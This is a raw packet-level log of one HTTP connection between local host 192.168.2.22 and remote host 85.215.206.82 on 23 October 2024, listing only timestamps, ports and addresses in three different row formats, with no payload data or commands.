Oct 23, 2024 17:27:18.288512945 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:18.288523912 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:18.288535118 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:18.288573027 CEST | 49173 | 80 | 192.168.2.22 | 85.215.206.82
Oct 23, 2024 17:27:18.288789988 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:18.288842916 CEST | 49173 | 80 | 192.168.2.22 | 85.215.206.82
Oct 23, 2024 17:27:18.288846970 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:18.288858891 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:18.288899899 CEST | 49173 | 80 | 192.168.2.22 | 85.215.206.82
Oct 23, 2024 17:27:18.385116100 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:18.385138988 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:18.385149956 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:18.385199070 CEST | 49173 | 80 | 192.168.2.22 | 85.215.206.82
Oct 23, 2024 17:27:18.429358959 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:18.429389954 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:18.429403067 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:18.429554939 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:18.429562092 CEST | 49173 | 80 | 192.168.2.22 | 85.215.206.82
Oct 23, 2024 17:27:18.429562092 CEST | 49173 | 80 | 192.168.2.22 | 85.215.206.82
Oct 23, 2024 17:27:18.429565907 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:18.429649115 CEST | 49173 | 80 | 192.168.2.22 | 85.215.206.82
Oct 23, 2024 17:27:18.429985046 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:18.430006981 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:18.430018902 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:18.430030107 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:18.430042982 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:18.430053949 CEST | 49173 | 80 | 192.168.2.22 | 85.215.206.82
Oct 23, 2024 17:27:18.430090904 CEST | 49173 | 80 | 192.168.2.22 | 85.215.206.82
Oct 23, 2024 17:27:18.430866957 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:18.430989027 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:18.431000948 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:18.431030035 CEST | 49173 | 80 | 192.168.2.22 | 85.215.206.82
Oct 23, 2024 17:27:18.504468918 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:18.504528046 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:18.504544973 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:18.504621029 CEST | 49173 | 80 | 192.168.2.22 | 85.215.206.82
Oct 23, 2024 17:27:18.504656076 CEST | 49173 | 80 | 192.168.2.22 | 85.215.206.82
Oct 23, 2024 17:27:18.525366068 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:18.525419950 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:18.525543928 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:18.525583982 CEST | 49173 | 80 | 192.168.2.22 | 85.215.206.82
Oct 23, 2024 17:27:18.525602102 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:18.525660992 CEST | 49173 | 80 | 192.168.2.22 | 85.215.206.82
Oct 23, 2024 17:27:18.548518896 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:18.548599958 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:18.548614025 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:18.548639059 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:18.548655033 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:18.548660040 CEST | 49173 | 80 | 192.168.2.22 | 85.215.206.82
Oct 23, 2024 17:27:18.548696041 CEST | 49173 | 80 | 192.168.2.22 | 85.215.206.82
Oct 23, 2024 17:27:18.548777103 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:18.548793077 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:18.548821926 CEST | 49173 | 80 | 192.168.2.22 | 85.215.206.82
Oct 23, 2024 17:27:18.549654961 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:18.549701929 CEST | 49173 | 80 | 192.168.2.22 | 85.215.206.82
Oct 23, 2024 17:27:18.549706936 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:18.549720049 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:18.549782038 CEST | 49173 | 80 | 192.168.2.22 | 85.215.206.82
Oct 23, 2024 17:27:18.549951077 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:18.550015926 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:18.550031900 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:18.550060987 CEST | 49173 | 80 | 192.168.2.22 | 85.215.206.82
Oct 23, 2024 17:27:18.550107002 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:18.550154924 CEST | 49173 | 80 | 192.168.2.22 | 85.215.206.82
Oct 23, 2024 17:27:18.623132944 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:18.623193026 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:18.623256922 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:18.623297930 CEST | 49173 | 80 | 192.168.2.22 | 85.215.206.82
Oct 23, 2024 17:27:18.623606920 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:18.623670101 CEST | 49173 | 80 | 192.168.2.22 | 85.215.206.82
Oct 23, 2024 17:27:18.644803047 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:18.644849062 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:18.644866943 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:18.644928932 CEST | 49173 | 80 | 192.168.2.22 | 85.215.206.82
Oct 23, 2024 17:27:18.667862892 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:18.667913914 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:18.667932034 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:18.667943954 CEST | 49173 | 80 | 192.168.2.22 | 85.215.206.82
Oct 23, 2024 17:27:18.668019056 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:18.668029070 CEST | 49173 | 80 | 192.168.2.22 | 85.215.206.82
Oct 23, 2024 17:27:18.668035030 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:18.668081045 CEST | 49173 | 80 | 192.168.2.22 | 85.215.206.82
Oct 23, 2024 17:27:18.668246031 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:18.668304920 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:18.668319941 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:18.668349981 CEST | 49173 | 80 | 192.168.2.22 | 85.215.206.82
Oct 23, 2024 17:27:18.668411016 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:18.668426037 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
Oct 23, 2024 17:27:18.668458939 CEST | 49173 | 80 | 192.168.2.22 | 85.215.206.82
Oct 23, 2024 17:27:18.707550049 CEST | 80 | 49173 | 85.215.206.82 | 192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.707608938 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.707770109 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:18.709357023 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.709455967 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.709533930 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:18.742485046 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.742508888 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.742527962 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.742816925 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:18.764025927 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.764056921 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.764101982 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.764117002 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:18.764153957 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.764246941 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:18.786971092 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.786992073 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.787019014 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.787034988 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.787051916 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.787089109 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.787162066 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:18.787162066 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:18.787162066 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:18.787666082 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.787683964 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.787703991 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.787765980 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:18.788018942 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.788063049 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.788078070 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.788108110 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:18.828430891 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.828464031 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.828483105 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.828538895 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.828545094 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:18.828571081 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:18.847625971 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.847683907 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:18.847697973 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.861789942 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.861821890 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.861839056 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.861840010 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:18.861881971 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:18.883548021 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.883593082 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.883608103 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.883637905 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.883666039 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:18.883708000 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:18.906105995 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.906272888 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.906287909 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.906306982 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.906323910 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.906342983 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.906354904 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:18.906378031 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:18.906833887 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.906851053 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.906867027 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.906982899 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:18.906982899 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:18.907135963 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.907201052 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.907205105 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.907243967 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:18.947856903 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.947880030 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.947901011 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.947978973 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:18.981102943 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.981127024 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.981137991 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.981161118 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:18.981179953 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:18.981194973 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.981210947 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:18.981280088 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.002840996 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.002857924 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.002873898 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.002929926 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.025686026 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.025754929 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.025772095 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.025834084 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.025854111 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.025876999 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.025876999 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.025929928 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.025933981 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.026010990 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.026026964 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.026062012 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.026135921 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.026151896 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.026181936 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.066957951 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.066993952 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.067012072 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.067131996 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.100331068 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.100357056 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.100398064 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.100492001 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.100507021 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.100533009 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.100533009 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.122082949 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.122103930 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.122119904 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.122289896 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.144670010 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.144695044 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.144710064 CEST804917385.215.206.82192.168.2.22
Timestamp                             Src Port  Dst Port  Source IP       Dest IP
Oct 23, 2024 17:27:19.144754887 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.144772053 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.144815922 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.144856930 CEST  49173     80        192.168.2.22    85.215.206.82
Oct 23, 2024 17:27:19.144857883 CEST  49173     80        192.168.2.22    85.215.206.82
Oct 23, 2024 17:27:19.144857883 CEST  49173     80        192.168.2.22    85.215.206.82
Oct 23, 2024 17:27:19.145307064 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.145359039 CEST  49173     80        192.168.2.22    85.215.206.82
Oct 23, 2024 17:27:19.145387888 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.145404100 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.145450115 CEST  49173     80        192.168.2.22    85.215.206.82
Oct 23, 2024 17:27:19.145483017 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.145498991 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.145549059 CEST  49173     80        192.168.2.22    85.215.206.82
Oct 23, 2024 17:27:19.185993910 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.186017990 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.186037064 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.186103106 CEST  49173     80        192.168.2.22    85.215.206.82
Oct 23, 2024 17:27:19.219357014 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.219392061 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.219408035 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.219486952 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.219558954 CEST  49173     80        192.168.2.22    85.215.206.82
Oct 23, 2024 17:27:19.219558954 CEST  49173     80        192.168.2.22    85.215.206.82
Oct 23, 2024 17:27:19.219676018 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.219724894 CEST  49173     80        192.168.2.22    85.215.206.82
Oct 23, 2024 17:27:19.219748974 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.219779015 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.219846964 CEST  49173     80        192.168.2.22    85.215.206.82
Oct 23, 2024 17:27:19.219886065 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.219902039 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.219955921 CEST  49173     80        192.168.2.22    85.215.206.82
Oct 23, 2024 17:27:19.241009951 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.241079092 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.241095066 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.241203070 CEST  49173     80        192.168.2.22    85.215.206.82
Oct 23, 2024 17:27:19.264012098 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.264058113 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.264074087 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.264163971 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.264182091 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.264230967 CEST  49173     80        192.168.2.22    85.215.206.82
Oct 23, 2024 17:27:19.264230967 CEST  49173     80        192.168.2.22    85.215.206.82
Oct 23, 2024 17:27:19.264417887 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.264458895 CEST  49173     80        192.168.2.22    85.215.206.82
Oct 23, 2024 17:27:19.264537096 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.264554024 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.264599085 CEST  49173     80        192.168.2.22    85.215.206.82
Oct 23, 2024 17:27:19.264605045 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.305074930 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.305102110 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.305116892 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.305221081 CEST  49173     80        192.168.2.22    85.215.206.82
Oct 23, 2024 17:27:19.338689089 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.338713884 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.338732958 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.338749886 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.338906050 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.338922977 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.338954926 CEST  49173     80        192.168.2.22    85.215.206.82
Oct 23, 2024 17:27:19.338954926 CEST  49173     80        192.168.2.22    85.215.206.82
Oct 23, 2024 17:27:19.338967085 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.338975906 CEST  49173     80        192.168.2.22    85.215.206.82
Oct 23, 2024 17:27:19.338984013 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.339044094 CEST  49173     80        192.168.2.22    85.215.206.82
Oct 23, 2024 17:27:19.339626074 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.339677095 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.339690924 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.339723110 CEST  49173     80        192.168.2.22    85.215.206.82
Oct 23, 2024 17:27:19.360388041 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.360474110 CEST  49173     80        192.168.2.22    85.215.206.82
Oct 23, 2024 17:27:19.360567093 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.360583067 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.360724926 CEST  49173     80        192.168.2.22    85.215.206.82
Oct 23, 2024 17:27:19.383145094 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.383162975 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.383182049 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.383244991 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.383301973 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.383344889 CEST  49173     80        192.168.2.22    85.215.206.82
Oct 23, 2024 17:27:19.383344889 CEST  49173     80        192.168.2.22    85.215.206.82
Oct 23, 2024 17:27:19.383409023 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.383426905 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.383459091 CEST  49173     80        192.168.2.22    85.215.206.82
Oct 23, 2024 17:27:19.383460045 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.383507967 CEST  49173     80        192.168.2.22    85.215.206.82
Oct 23, 2024 17:27:19.432707071 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.432729006 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.432748079 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.432771921 CEST  49173     80        192.168.2.22    85.215.206.82
Oct 23, 2024 17:27:19.457685947 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.457701921 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.457717896 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.457809925 CEST  80        49173     85.215.206.82   192.168.2.22
